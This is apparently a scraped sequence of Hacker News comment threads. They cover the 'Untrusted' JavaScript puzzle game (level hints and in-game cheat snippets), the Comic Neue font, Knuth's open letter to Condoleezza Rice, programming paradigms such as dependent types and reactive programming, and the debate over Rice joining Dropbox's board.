I tried to move the exit inside the walls. I was unable to edit any of the code. I thought that was the point?
epsylon 5 days ago 1 reply      
Is there any solution to the ambush level other than the obvious solution of moving the drones out of the way?
wingerlang 5 days ago 1 reply      
Any way I can go to a level directly? I was on level 12 but my computer died, and it did not save any progress.
icedog 6 days ago 2 replies      
Level 1 just reloads after I get to the exit.
Slix 6 days ago 1 reply      
This music is awesome. What genre is it?
tyilo 6 days ago 1 reply      
I didn't get the last 3 DOM-based ones. I just randomly hit my arrow keys and until I completed the levels.

Otherwise a very cool game!

frankienwafili 6 days ago 0 replies      
In order to fix that short delay before movement when you hold down a movement direction you should make pressing the arrow keys set a corresponding movement boolean to true. Then just move whenever the boolean is true.

Great game!

neil_s 6 days ago 5 replies      
Any tips for level 9? I can't seem to find a handle on the raft to be able to modify its behaviour directly.
gabemart 6 days ago 9 replies      
Can anyone give me a hint for level 12?
crawfordcomeaux 5 days ago 0 replies      
How long before "Twitch plays Untrusted"?
ezarowny 6 days ago 0 replies      
I really like that it has WASD/Arrow/Vim controls. Props.
pacofvf 6 days ago 2 replies      
:'( I'm stuck at crispsContest.js lvl
riverjiang 5 days ago 2 replies      
Any tips for level 17? I can't seem to figure out a solution for the teleporters using the getObjectCoords hint that was given
bayonetz 6 days ago 0 replies      
A simple nuclear trick for LvL two and on:http://pastebin.com/c7vqzrU3
davearch 6 days ago 1 reply      
This is awesome but it keeps repeating the first level! I get the solution but then it just reloads everything.
madvlad 5 days ago 0 replies      
Not sure if you noticed this yet or not, but it is possible to comment all code following an allowed block by leaving an open "/*". This allows the player to write their own code to overwrite what should be uneditable.

not sure if you would want to disallow this or not, but i find it allows for some interesting hacky solutions.

jbeja 6 days ago 1 reply      
I reach level 60, says the counter(just because the game buged after i try to clear level 6): http://imgur.com/ty9JlXz.
tinacgh 6 days ago 0 replies      
Is there an easy way to transfer progress between computers? (other than saving your solution Gists?
tall 6 days ago 0 replies      
level 35! https://gist.github.com/anonymous/25b4b4b56f844368a37c here's to calling into the code behind using pattern matching and the nifty in operator
kccqzy 5 days ago 2 replies      
I actually used a "private API" in level 14, crisps contest.


Is this cheating?

resist_futility 6 days ago 6 replies      
Any tips on level 15? Once the player is killed what could I possibly do?
javajosh 6 days ago 2 replies      
Very cool! I'm stuck on level 7 because it seems that the script isn't editable anywhere. Related note, the color scheme for highlighting editable lines might want to change, because "black on dark maroone" doesn't exactly jump out.

Love that you're auto-gisting solutions. That was clever - I presume you are browsing through searching for the common description tag? I also like the API popup, although I didn't see it until I got stuck on the (uneditable) level 7. I verified this because $('.editableLines') ==[] in console! Perhaps this is a very fancy meta-game that you can only win with a pull request? :)

mszmszmsz 5 days ago 0 replies      
devilshaircut 6 days ago 1 reply      
I broke level 4. Is there an obvious way that I am missing to reset at the level you're on when the reset functionality provided under the text editor is insufficient?
cheepin 5 days ago 0 replies      
aww, I tried to sacrifice my phone for an easier solution for the last problem, but apparently I need it in the end.
tpae 6 days ago 2 replies      
stupid drones, me.selfDestruct (tableflip)
YuMS 4 days ago 0 replies      
LV 20Math.random = function() {return 1;}map.getPlayer().hasItem = function() {return true;}
icemelt8 5 days ago 2 replies      
Stuck at level 13 :(
Jupiterlyght 6 days ago 0 replies      
dang this is awesome
cproctor 6 days ago 0 replies      
I won!
BostX 6 days ago 1 reply      
In level 10 ambush I set

        function (me) {}
for the red and yellow drones and

        function (me) {            var r = 'right:'+me.canMove('right');            var l = 'left: '+me.canMove('left')            alert(r+'; '+l);        }
for the green drones. But I always get 'right:true; left: true'. WTFFFFFF? :-(Please please fix that, please!!!

Comic Sans, meet Comic Neue comicneue.com
490 points by calibwam  6 days ago   155 comments top 35
malanj 6 days ago 4 replies      
I agree with this (http://www.snapily.com/blog/comic-sans-why-all-the-hate/) and specifically the comment by the creator of Comic Sans: If you love it, you dont know much about typography, Mr. Connare says. But, he adds, if you hate it, you really dont know much about typography, either, and you should get another hobby. This meme was become a bit tiresome imho.
Intermernet 6 days ago 5 replies      
Just a quick note to the authors:

To test every letter in the English Language Alphabet use The quick brown fox jumps over the lazy dog, and not The quick brown fox jumped over the lazy dog.

Otherwise you miss the s.

EDIT: Some fun reading http://en.wikipedia.org/wiki/List_of_pangrams

freshyill 6 days ago 1 reply      
You know, there are, and have been many, many good comic fonts out there. Blambot sells them gives many others away for free. This is where actual comic book creators go for fonts.

Anytime I see someone insisting on using Comic Sans, I gently inform them that Comic Sans isn't even a good comic font, and point them to Blambot, where they can get better ones.


computer 6 days ago 4 replies      
> "Download Comic Neue, free for a limited time"

What does that mean? There's no real license information anywhere.

1_player 6 days ago 4 replies      
As a programmer, I really love Cosmic Sans Neue Mono (which I don't think is related to this typeface) -- now renamed to Fastasque Sans Mono:


You either hate it or love it, and I find it gorgeous on Sublime Text.

_ak 6 days ago 0 replies      
People keep listing alternatives, here's another one: Comic Jens. http://www.netzallee.de/extra/comic-jens-en

It's even CC-licensed.

binarymax 6 days ago 0 replies      
This is headed in the right direction - but certain things still make the text look not quite right. The angle on some of the vertical lines is still off, giving an unsettling effect, and the curve on 'C/c' need to be smoothed out a bit. Now the next step is to write a worm that replaces comic sans with this on all machines.
coffeecodecouch 6 days ago 4 replies      
First thoughts: I like it, it will be interesting to see what the typography community has to say. Slightly off topic, but it's funny how Comic Sans, a font, has become so widely hated and mocked even among non-tech savvy people. There seems to be a tipping point where something becomes cool to hate. It's absolutely impossible nowadays to use Comic Sans, even if it's completely appropriate for the situation, without being mocked by people who have never used anything else but Times New Roman.
BasDirks 6 days ago 4 replies      
The kerning is sloppy, see "f ox".
Wohui 6 days ago 0 replies      
"The squashed, wonky, and weird glyphs of Comic Sans have been beaten into shape while maintaining the honesty that made Comic Sans so popular."

It's half as honest. It's dilute Comic Sans. It's the diet coke of casual.

zokier 6 days ago 0 replies      
I think this is too regular/rigid to be true replacement to Comic Sans.
craigrozynski 6 days ago 3 replies      

You will notice some issues if you use Windows Chrome, which doesn't render TTF well, particularly italics and obliques.

The fix for this is to include SVG font files. I excluded SVG as they're 'advertised' as only existing to support legacy iOS. Today I found out that's not entirely the case.

As for licensing, I provide the files for free for now and state on the site 'No attribution acquired'. I'm being vague because at this point I'm undecided whether to start selling it or not.

Thanks :D

r12e 6 days ago 0 replies      
I've always loved comic sans, it's like a family Labrador that just wants to have fun.

When more discerning people around me criticise it, I send them off to read: http://www.mcsweeneys.net/articles/im-comic-sans-asshole

Thanks for the refresh, OP. I can't wait to see where I can sneak this in.

skywhopper 6 days ago 0 replies      
Public domain license? Awesome! Typographers after my own heart. We need more people to be willing to release their work into the public domain. I'd love to see new open-source projects choose public domain over Apache- or BSD-style permissive licenses.
akdetrick 6 days ago 0 replies      
Comic Sans does serve one good purpose; it's a dyslexia-friendly typeface. It's nice that Comic Neue preserves some of the letter "hints" (ie. the "b" and "d" glyphs have slightly different bottom terminals).

Although if you're trying to optimize specifically for dyslexia, you'd be better off with something like OpenDyslexic [1].

[1] - http://opendyslexic.org/about/

davexunit 6 days ago 0 replies      
Proprietary font? No, thanks.
dghf 6 days ago 1 reply      
"... perfect ... for ... writing passive aggressive office memos."


Pxtl 6 days ago 1 reply      
It's bikeshedding since I know nothing about design, but I feel like the name is a bad fit. Comic Sans looks more like a comic speech-bubble script than Comic Neue. Comic Neue looks like a better hand-printed font, but it would look worse in a speech bubble.
factorialboy 6 days ago 1 reply      
Nice, a monospace variant would be awesome!
ChrisNorstrom 6 days ago 1 reply      
Beautiful. Friendly. Human. More readable. You've redeemed one of the most hated fonts. You might want to fix up a few kerning issues and re-release but overall I love it. Feels friendly and personable.

If you can do the same with Papyrus you will be knighted.

BESebastian 6 days ago 1 reply      
"The squashed, wonky, and weird glyphs of Comic Sans have been beaten into shape while maintaining the honesty that made Comic Sans so popular."

Doesn't this directly make Comic Neue inferior to Comic Sans for people with dyslexia, one of the original fonts plus points.

Tloewald 6 days ago 0 replies      
The metrics on this font are a bit weird. E.g. as the type gets bolder it seems to tighten up vertically.
aaronetz 6 days ago 2 replies      
Slightly off-topic, but can someone recommend a good book about typography? I mean more about the history of typography, less about how to design new fonts.
kalms 6 days ago 0 replies      
I really like it, although the kerning definitely needs some fine tuning, as others have already mentioned. I have a hard time seeing it catching on though, but I hope I'm wrong! Good job!
lngric006 6 days ago 0 replies      
Who wants to break it to them that it should be jumps not jumped :)
symmetricsaurus 6 days ago 1 reply      
The oblique versions don't work on Windows(7). The letter shapes are severely deformed and the sizes are all over the place.

Otherwise I think it could be a usable font (if not for the prevailing opinion about comic sans).

MCarusi 6 days ago 0 replies      
I've never had a reason to use Comic Sans in any particular project, but the way people talk about it you'd think it was a mass murderer. It's just a typefont, guys.
currysausage 6 days ago 1 reply      
What is "Comic Neue" supposed to mean?

It's "Neue Helvetica", not "Helvetica Neue". It's only called "Helvetica Neue" in lists for the sake of alphabetical sorting.

German "Neue" always stands before the noun. "New Helvetica" -> "Neue Helvetica". The generic form is "Neu", so "Helvetica New" -> "Helvetica Neu".

notindexed 6 days ago 2 replies      
that kern ing
stuaxo 6 days ago 0 replies      
But does it work well in comics ?
duongkai 6 days ago 0 replies      
It does not support unicode characters.
sevkih 6 days ago 0 replies      
should've made it a banana stand, there is always money in the banana stand
joshdance 6 days ago 0 replies      
I like it.
ivanca 6 days ago 0 replies      
FYI "I-hate-comic-sans" is better and is permanently free: http://www.dafont.com/i-hate-comic-sans.font

Also, Rondouillar: http://www.dafont.com/rondouillard.font?l[]=1

forrestthewoods 6 days ago 2 replies      
Yes. How dare those mothers use Comic Sans when printing a flyer for their child's birthday party instead of scouring the internet for a free but also appealing font!
Knuth: Open Letter to Condoleezza Rice (2002) stanford.edu
488 points by sfk  3 days ago   170 comments top 31
dmix 3 days ago 26 replies      
Amazon is building a $600 million datacenter for the CIA. The CIA did all of the bad things listed in Dropbox article as directed by Bush and Condoleezza, and they are still actively trying to cover up torture. I've never heard anyone here not using EC2 over it?

The tech scenes pitchfork mobs are wildly inconsistent.

I have a feeling this one hit a nerve because Condoleezza Rice is famously hated across the internet and in the press (especially on the Daily Show) and this isn't really about upholding some strong high-moral consistency that we all have.

m52go 3 days ago 5 replies      
Simply removing Condi as a board member doesn't solve anything. The move to make her a board member puts the motivations of the entire Dropbox leadership team in question.

Today, Dropbox hurt its reputation very badly, regardless how this ultimately plays out.

wging 3 days ago 0 replies      
ionfish 3 days ago 1 reply      
mathattack 3 days ago 1 reply      
It may help to put 2002 in the title, as this relates to the war in Iraq rather than Dropbox. (It's still interesting, and worth an upvote!)

When people go after her, I wonder, "What about Kissinger?" He was part of a lot of cold hard decisions in tough times on the world. That said, I would enjoy his counsel if I wanted to get involved in China. Similar with her, though her expertise may be more in Russia.

My (non-expert) observation is she was pushed and marginalized by the hawks. And although the war sounds bad now, the country was very much for it back then.

Zigurd 3 days ago 0 replies      
Silicon Valley and the Military Industrial Complex need to see other people. It was a pretty hot relationship for a while, but the MIC turned out to be kind of a creeper. They put a camera in the shower, and lied about it. That's not healthy.
mbesto 3 days ago 1 reply      
Curious - should we be crucifying Stanford as well?


NotOscarWilde 3 days ago 7 replies      
I think it's important to ask not only whether somebody is a good ideological representative for a company, but also whether ousting them does us any good.

The parties on both sides of the Rice/Dropbox debate have good arguments:

* Ms. Rice has been a very important representative of a US administration that caused a lot of people to die in Iraq and elsewhere;

* but she is not the only one in the government of that day, and many other (non-bullied) politicians are complicit as well;

* and the current president has not shown much anti-torture sympathies either, yet him being branded a Democrat makes him much less of a target.

I believe channeling energy to make Ms. Rice leave Dropbox solves nothing. Channeling the same outrage to make the elective system into a non-money-based race, to make the politicians accountable for what they promise before elections -- that may solve something.

As a non-American, stating an opinion is about all I can help you with. Good luck!

raheemm 3 days ago 0 replies      
DK's letter is from 2002. Which makes it even more admirable.
zhaphod 3 days ago 1 reply      
People who beat drums of war have so many dollars stuffed in their ears that they can't hear the cries of people killed by bombs and bullets.
atmosx 3 days ago 0 replies      
Knuth never stops to amaze me. I didn't study CS, so to me he is one of those places that I probably never go. But still gaze with admiration and a little bit of terror.

Cached copy here[1].

[1] http://www.google.com/url?sa=D&q=http://www.google.com/searc...

gretful 3 days ago 0 replies      
I wonder how many people here will feel the same about, for instance, Rahm in Chicago, or others of Obama's circle of friends, when they begin moving into private business? Will they be held to the same standards?
not_paul_graham 3 days ago 1 reply      
I really hope that these top posts on HN influence at least some employees at Dropbox to resign publicly because Dropbox's core (meaty revenue generating) users aren't HN readers anymore, but the mass market & enterprises that aren't going to care.
mschuster91 3 days ago 0 replies      
"that almost blindly supports Israel's increasingly unjustifiable occupation"... I wonder why that one hasn't been called out yet. Where are the Israel fanatics?
MBCook 3 days ago 0 replies      
jebblue 3 days ago 0 replies      
>> P.S. This is the second time in my life that I have written a letter to a U.S. government official. The first time was during the Vietnam war.

I wonder if he wrote it to Lyndon B. Johnson asking why he started the war in the first place or perhaps querying how much involvement he had in the Kennedy assassination.

grifpete 3 days ago 0 replies      
She has been an outspoken apologist for some pretty heinous policies. It is rational to assume she hasn't changed.
fedxc 3 days ago 0 replies      
I am glad to see an American stating the following:

>If we peremptorily strike country X, why shouldn't country X have a right to do the same to us, and to our children and grandchildren in future years?

shmerl 3 days ago 2 replies      
> almost blindly supports Israel's increasingly unjustifiable occupation

Stopped reading since there, since it sounds like a usual blind rant and not anything to do with reality or reason. The moment conflict in Israel kicks in, many otherwise reasonable people lose common sense (it can go in either direction about the sides of the conflict IMHO). Not sure why it's so really.

Otherwise valid criticism is discredited by such cliche phrases which don't suit someone like Knuth.

broken 3 days ago 0 replies      
detcader 3 days ago 1 reply      
I've seen a lot of comments here pontificate about being above "political litmus tests." Torture is political? Death on mass scale is political now? Wiretapping is political? Violation of international law is a political stance? Noam Chomsky thanks you for proving his points for him.
rhspeer 3 days ago 0 replies      
down for me, this is the google cached version for the lazy:http://webcache.googleusercontent.com/search?q=cache%3Ahttp%...
FD3SA 3 days ago 0 replies      
Oh, and for our friendly HN militants, who are coming out in droves to support the Iraq war:


Occam's razor is your friend.

sparkzilla 3 days ago 0 replies      
Everyone is guilty of having opinions and actions that others do not like so let's just boycott everything and everybody and be done with it.
shrnky 3 days ago 1 reply      
This whole episode reminds me that staunch liberals are no different than religious fundamentalists AFAIK. Same nature, different nurture.

Both groups hypocrisy knows no bounds.

mtimjones 3 days ago 0 replies      
Why not talk about Obama's war in Afghanistan, or increasing tensions with Russia, or abuse of spying? Way more relevant than a 12 year old letter...
jgemedina 3 days ago 0 replies      
and she's a dropbox board member!
boondox 3 days ago 0 replies      
It doesn't get any clearer than that...
edw519 3 days ago 3 replies      
You lost me at almost blindly supports Israel's increasingly unjustifiable occupation.

Why is it that people who know so much about one thing feel compelled to open their big mouths about something else they clearly know so little about?

supergeek133 3 days ago 0 replies      
I can't really handle this... Is this what we've become? So short sighted?

I know few who didn't want to blow up the entire middle east after 9/11, right, wrong, or indifferent. I'm also fairly sure government was relatively in agreement about the war when it started.

Unless you hold EVERYONE in the current administration, and everyone in government in general for the past 20 years regardless of party to the same standard, stop it here.

Torture? OK. Hasn't stopped.Stealing of information? Hasn't stopped. Didn't start with them, if you don't believe that, you're ignorant. Just obvious evidence of it starts here.

In the end, do you think that DropBox leadership didn't think about this? I hope they did, and were prepared for it.

I'm rambling a bit, but some of the anger here I guarantee won't be directed equally.

pavelrub 3 days ago 1 reply      
I don't understand what people are admiring here. This "letter" is nothing more than a meaningless rant by a person whose field of expertise has nothing to do with politics, economy, international relations or terrorism. Donald Knuth is a great computer scientist, but hearing him talking about international politics is like hearing any other random person on the street.

Also: "...and that almost blindly supports Israel's increasingly unjustifiable occupation".


Let the downvotes begin.

Programming paradigms that change how you think about coding brikis98.blogspot.com
480 points by niels  3 days ago   195 comments top 30
AlexanderDhoore 3 days ago 1 reply      
The aurora language seems very interesting. Too bad there is already another language called Aurora...

I makes me think of Elm [1] and (functional) reactive programming. Reactive programming is fantastic. It's kind of like how a spreadsheet program works. If a variable changes, all variables who depend on it change as well. Given "a = b + c", if c increments by 1, so does a.

It has many advantages over event based systems, like Javascript. Reactive programs don't need callbacks. The changing values propagate the "event" through the system.

I'd love to hear what you guys think about this direction of programming. It seems very natural to me.

Edit: I also see reactive programming as the golden way of having changing state in functional languages. Functional languages have no problem with data or state. They have a problem with change of state. The reactive paradigm solves that problem. All change is implicit and code can be exactly as functional as before.

[1] http://elm-lang.org/

[2] http://en.wikipedia.org/wiki/Reactive_programming

jarrett 3 days ago 10 replies      
A thought on dependent types:

Can a dependent type system catch all type errors at compile time? For example, suppose I write the following (in pseudo-code):

  // Variable x is an integer greater than or equal to 0 and less than 256.  int x (>=0, <256)   x = 128 // This is valid.  x = x * 3 // This violates the type.
I can imagine how a compiler could catch that kind of error. But that's trivial. What happens in programs like this:

  int x (>= 0, <=10)  x = parseInt(getKeyboardInput)
Now the compiler can't know for sure whether the type has been violated, because the value of getKeyboardInput could be anything. To take a page from Haskell, you could do something like this (which is still pseudocode, not valid Haskell):

  // x is a value that is either 1) an int from 0 to 10, or 2) nothing at all.  maybe (int (>= 0, <=10) x    // applyConstraint recognizes that parseInt may return a value violating x's contraints.  // Thus it transforms the return type of parseInt from int to maybe (int (>= 0, <=10)  x = applyConstraint(parseInt(getKeyboardInput))
Or perhaps applyConstraint wouldn't have to be called explicitly, but would be implicitly added by the compiler as needed. I'm not sure which is better stylistically.

Either way, applyConstraint would be required any time a computation could return an invalid value. That would get tricky, because the compiler would have to track the constraints on every variable, even where those constraints aren't declared. For example:

  int w (>= 0, <= 10)  int x (>= 0, <= 2)  int y  int z (>= 0, <= 20)  y = w * x  z = y
Here, the compiler would have to infer from the assignment "y = w * x" that y is always between 0 and 20.

Do any languages currently take the idea this far (or farther)?

bru 3 days ago 6 replies      
Some notes:

- parallel and concurrent are 2 different things

- the 'symbolic languages' definition seems off. Wikipedia puts it right:

> symbolic programming is computer programming in which the program can manipulate formulas and program components as data

So it's not "using graphs & such to program"

simias 3 days ago 2 replies      
In the "concurrent by default" section I would add the hardware description languages like VHDL and Verilog.

Learning Verilog was an eye opening experience for me. It reminded me of the time I switched from unstructured BASIC to C when I was a kid. At first it seems complex and weird then suddenly it clicks and it all starts making sense.

milliams 3 days ago 1 reply      
QML [1] is an interesting example of declarative programming. It allows constraints and relationships to be defined and the runtime will do the rest. Perhaps it's not as powerful as other languages but in its domain it does very well.

[1] https://en.wikipedia.org/wiki/Qt_Modeling_Language

untothebreach 3 days ago 2 replies      
I was a little disappointed that Factor[1] didn't get a mention in the 'Concatenative' section. Its stack effect checker takes care of a lot of the problems he mentions, IMO.

1: factorcode.org

lolo_ 3 days ago 2 replies      
I think an underrated non-standard approach to programming is graphical programming. Though this approach doesn't seem to received significant uptake amongst professional programmers, there is an application called max [0] that is popular amongst musicians and artists and quite surprisingly powerful and effective.

There's an interesting article [1] on how Jonny Greenwood of Radiohead uses it extensively, in there you can see some examples of how it works - modules wired together visually.

I think there is a lot of potential for a really nice mix between text-based programming and graphical programming to work for general programming too.


hexagonc 3 days ago 0 replies      
My first and only encounter with "Concatenative Languages" was programming the HP48GX[1] graphing calculator in highschool. Thinking back to it, I'm amazed by what you could do with it. It was very powerful even by today's standards. Whereas other kids had Gameboys, I had an "HP". I even got in trouble playing tetris on it during my German language class. My calculus teacher never knew that you could do symbolic integrals and derivatives with it (using a free computer algebra library). Sadly, the only program of note that I wrote for it was an implementation of the The Game of Life[2].

[1] http://en.wikipedia.org/wiki/HP-48_series[2] http://en.wikipedia.org/wiki/Conway%27s_Game_of_Life

sirsar 3 days ago 3 replies      
LabVIEW is concurrent by default; control flow is done by linking the outputs of one function to the inputs of another. This makes writing concurrent loops ridiculously easy: just put two loops next to each other.

I rarely use it because organization is such a pain, but its "data-flow" paradigm does simplify a lot of logic.

prezjordan 3 days ago 0 replies      
I wish APL/J/K were on here, but I guess that doesn't really change the way I think about coding... it just blows my mind.
mjb 3 days ago 0 replies      
Other languages to add to this list would be Dijkstra's Guarded Command Language, and Promela. Promela is especially interesting because of the (nondeterministic) execution semantics, which provide an extremely interesting way to model parallelism. In a similar vein, TLA+ is worth a look.

Both Promela (Spin) and TLA+ have active communities and have found fairly wide use in industry. They are generally used for model checking, model extraction by guided abstraction, and development by refinement, but can be used in a much more adhoc way to just experiment with parallel ideas.

saosebastiao 3 days ago 1 reply      
I'm a huge fan of the declarative programming paradigm, but outside of Regexp and SQL and a handful of other DSLs, it's dead. Its death should be a case study in Open Source strategy: It died because it became boring before it became useful. SQL and Regexp have stuck around because they did something useful immediately.

I think that any future that the Declarative paradigm has within general purpose languages is the kind applied by compilers. For example, x = (a + b) - a can be reduced to x = a or even eliminated altogether with subsequent in-scope references to x being replaced with a. Another example is dead code elimination. These forms of declarative let you use an imperative or functional language immediately but gently introduce you to declarative benefits without having to deal with all the mind bending that is necessary to optimize pure declarative code.

sergiosgc 3 days ago 2 replies      
Where is Aspect Oriented Programming and all the other offspring of the Inversion of Control pattern (Dependency Injection, Dependency Inversion, ...)?

Is this line of evolution in languages considered dead?

Blahah 3 days ago 4 replies      
The concurrent by default paradigm looks like it could be really useful for some cases. Does anyone know of any more well-used languages that support it?
kazagistar 14 hours ago 0 replies      
If a programming paradigm does not change how you think about coding, it isn't a programming paradigm. Good article though.
kitd 3 days ago 0 replies      
Pointed out elsewhere, but ANI appears to be dead according to its own tutorial[1]. However Funnel[2] by Martin Odersky/EPFL does a similar job, with a more explicit nod to Petri nets which are usually used as the basis for concurrent systems.

[1] https://code.google.com/p/anic/wiki/Tutorial[2] http://lampwww.epfl.ch/funnel/

josephschmoe 3 days ago 0 replies      
Code Search is a better way to do Declarative Programming for non-optimized solutions. I've been obsessing over this topic for the last few months. Right now there's limited versions in a few places: Python's howdoi and Visual Studio's Code Search.

A true Code Search would work like this:1. Type in your search term in your code in a comment line. i.e. "Bubble sort StampArray by name"2. Google/Bing/StackOverflow searches for your string. Replaces your terms with generics. Searches for "Bubble sort [an array of objects] by [string variable]"3. Takes code results and shows them to you. Replaces all instances of [string variable] with getName() and all instances of [Object[]] with StampArray.4. You pick your favorite.5. Your IDE adds the code to a "code search module" which you can edit.6. Your edits get added to the search database.

The best part? You could even put your Declarative Programming engine -inside- of the Search just by populating initial search results.What about better code coming to exist in the future, you say? Well, you don't necessarily have to keep the same result forever. If it's been deprecated, you can re-do the search.

z3phyr 3 days ago 5 replies      
Since 'functional' is not mentioned, I will assume that it is mainstream now!
protomyth 3 days ago 1 reply      
I've been thinking a lot about agent-oriented programming. I had a General Magic device back in the day and later thought the concept of a Telescript like language as applied more for code organization than code mobility might be interesting. I guess APIs won, but I still think there is something there.
keenerd 3 days ago 0 replies      
Declarative programming is a great one, almost a magical experience.

"It feels like I am sitting at the controls of a quantum computer. I've got all my qubits (terms) all wired together in some complicated expression and when power is applied every qubit will instantly collapse out of superposition and crystallize into a perfect answer."

(From something I've been working on, http://kmkeen.com/sat/ )

danielweber 3 days ago 1 reply      
I'm in the midst of something else and can't pull out my C++11 book now, but doesn't C++ have custom types that would let you declare something like "this must be a positive integer"?

I might be confusing this with custom literals.

josephschmoe 3 days ago 0 replies      
Dependent types are a wonderful idea so long as I can do a couple things with them:1. Copy paste them without complications. i.e. "non-null" requires no code that relies on specific variables unless there's a logical conflict (which variable?)2. If it's a known failure, give me a warning. If it's an unknown failure, let me choose how to deal with it, again in a neutral fashion that I could simply say @Notnull<skip> and it would just skip the code if the variable is null.
aufreak3 2 days ago 0 replies      
Would be good to add Mozart/Oz.

Dealing with process coordination using the resolution of logical variables gave me a refreshing new perspective. The finite domain constraint system design in Oz is an awesome example of this in action.

An interesting tidbit - the Mozart/Oz team invented "pickling" before it caught on with Python.

josephschmoe 3 days ago 0 replies      
Would be pretty cool to have concurrency by default and then a lock declaration I could do on a particular function to fix any concurrency issues. Would need a new style of debugger/code view though specifically for this purpose.
cowls 3 days ago 1 reply      
I read it, and how I think about coding remains the same as before I read it.
JupiterMoon 3 days ago 5 replies      
Isn't "Dependent types" just re-inventing how Fortran handles non allocatable array and character variables i.e. those who's length is declared at compile time using a parameter?
jameshart 3 days ago 5 replies      
This is a substantial piece of writing with information many here would find interesting; putting it behind a buzzfeed list style headline does it a disservice. One step short of calling it "Six weird programming paradigms that will blow your mind".
snorkel 3 days ago 1 reply      
10 Ways Buzzfeed-style Headlines Will Forever Be Annoying
joshlegs 3 days ago 0 replies      
.... did .... did you crosspost this from reddit ???


SeanLuke 3 days ago 2 replies      
> If you've used SQL, you've done a form of declarative programming

This is so wrong I don't know where to begin.

Condoleezza Rice Joins Dropboxs Board As It Names New CFO, COO techcrunch.com
478 points by hashx  3 days ago   347 comments top 71
cryoshon 3 days ago 14 replies      
Well, that's the end of my usage of Dropbox, effective immediately. I'll make sure to mention Condi's association with them in every conversation involving Dropbox, in hope of spreading knowledge about their profane selection of board members.

It's a shame that they had to pick a Bush crony. These people should be in prison for malevolently misleading the public in order to start a for-profit war which killed hundreds of thousands of people.

acjohnson55 3 days ago 4 replies      
I hope she hasn't ever donated to any disagreeable referendum campaigns.....

....or ever been a core member of an administration that left us with two disastrous wars, an offshore gulag, the greatest economic disaster in 70 years, a record of legitimizing torture, a decline in prestige on the world stage. Oh, and a strong record or rejecting marriage equality.

peterkelly 3 days ago 3 replies      
Wow, and I thought the recent Mozilla thing was controversial...

Popcorn status: Ready

flexie 3 days ago 0 replies      
I don't understand - is that because Dropbox wants to make it more clear to the world that there is a free flow of information from Dropbox to the US government?
bane 3 days ago 1 reply      
This is probably tied to the DB for business offering and probably a play to become the official shared files app for USG and expansion into Asia.


Dropbox announce two more executive changes today. The company has a new CFO, Sujay Jaswa, who is being into the role internally. Also, hailing from Google is Dropboxs new COO: Dennis Woodside. In the post announcing those changes, it reaffirmed the above, indicating that Rice will help the company with its international operations.

Also check out Rice's consulting firm which has been providing consultation to DB for a while now. http://www.ricehadleygates.com/

The "work" page is illuminating.

- either way, this is potentially explosively bad for DB.

edit I'll also refer back to a recent comment of mine about how DP can scan your files


Now extend that to China providing lists of hashes of banned files, like Falun Gong texts or whatever.

If you rely on DP a lot, it's like allowing government(s) to sniff around your personal hard drive.

jellicle 3 days ago 1 reply      
I find this board appointment alarming for what it signals.

We know that the NSA et al. are always seeking access to new sources of electronic data. It is beyond doubt that they have considered how to get access to Dropbox user data, and almost certainly beyond doubt that they have approached Dropbox about it.

To me, this appointment signals that Dropbox wants to reach a negotiated settlement with the NSA over their access to Dropbox user data. They hire someone who knows all the key players and issues, to negotiate on their behalf. Presumably Ms. Rice will be instructed something like:

"We're getting a lot of pressure from the NSA. If the public knows we are giving away their data, there will be a shitstorm, it'll cost us a lot of business. So, you have to make sure NSA access to our data is somewhat limited, there's some kind of plausible legal authority, a court order or something, make sure they pay us for our efforts in copying the data over to the NSA, that sort of thing. Set it up so we can put all the blame on the NSA if anything leaks, and claim we were mandated to comply by law. Okay?"

And then Ms. Rice will be dispatched to undertake that negotiation.

So, if the NSA doesn't yet have a pipeline from Dropbox to that datacenter in Utah, they will soon.

mathattack 3 days ago 3 replies      
My first instinct on seeing the title was "What does someone like this (or Al Gore, or any other politician) have to offer a tech startup?"

Then the article makes it more clear: "Whats interesting about bringing Rice onto Dropboxs board is how normal it feels. Dropbox needs people with international experience to help it at once deal with foreign governments that have blocked its use China, for example and as it works to spread a product developed in one country to others that are culturally different."

Her connections at Stanford may help, though perhaps they're not as hard to find.

gnu8 3 days ago 4 replies      
The problem with Rice is that she is a malevolent liar. She's unfit for any leadership position, public or private.
bachback 3 days ago 0 replies      
"sudo apt-get remove dropbox", never to return. it seems obvious that most US tech companies have not at all realized that they are a global business, and the implications of the Snowden summer.
JabavuAdams 3 days ago 1 reply      
Ok, if I cancel my Dropbox subscriptions, I'd like to maintain some level of consistency.

Assuming that I have a great disdain for the architects of the Iraq and Afghanistan wars, which other tech companies should I consider boycotting?

To avoid a combinatorial explosion, I'd limit myself to executives or boards pulled from state, military, and intelligence roles in the last three administrations. Oh, and McNamara. Fuck that guy.

DominikR 3 days ago 0 replies      
I'd just like to know what the hell they were thinking when they gave her the job since I don't believe that many US citizens have fond memories of her.

Couldn't she just get herself a job in the Oil/Gas industry or at some company that creates weapons of mass destruction like everyone else does after they leave a government position.

ptbello 3 days ago 1 reply      

Reason: Other

Care to elaborate: Condoleezza Rice

matthewmacleod 3 days ago 3 replies      
So I've been wanting to migrate away from Dropbox and onto a self-hosted solution for a while anyway, and I guess this would be a good opportunity to do so.

Unfortunately, there don't appear to be any good open-source solutions at the moment. I'm not looking for a fancy web interface or anything, just a simple sync between devices, with a usable API for building apps.

In particular, rsync etc. doesn't really offer this interface, and I'm really not convinced by the usability of e.g. OwnCloud. Any solutions I might be missing? Or is this something I have to build myself?

beaker52 3 days ago 0 replies      
We assumed the best pre-PRISM and we got PRISM'd. Dropbox, I'm out.

I love Dropbox, it's my favourite service that I use regularly. However, I cannot trust Dropbox with the privacy of my data now.

vdaniuk 3 days ago 7 replies      
Sooo, will we be seeing a repeat of the Eich-like public outcry?

Though I may understand the business rationale for this hire, I certainly wont trust founders, board or anyone else at Dropbox who is OK working with a person that is partially responsible for deaths of thousands(arguably hundreds of thousands) people in the Iraq war based on false premises about "WMD".

Oh, and we shouldn't forget about her role in "enhanced interrogation techniques", too.

EDIT: Thinking a little more about this I will be cancelling my Dropbox subscription.

EDIT2: Yes, we are seeing an outcry. I am incredibly happy that coolness factor in tech is now more connected to ethical behavior of its top management and board members.

BjornW 3 days ago 0 replies      
As a non US person I don't get why she would be beneficial for (as not_paul_graham states) "navigating foreign business opportunities." My first thoughts, as a person living in the EU are exactly opposite.
znowi 3 days ago 0 replies      
That's unfortunate and I, too, will be closing my account with Dropbox. Moving to SpiderOak.

I realize, though, that neither me nor thousand others will change the Dropbox policy. They most likely anticipated the public outcry over Rice and considered it not a threat.

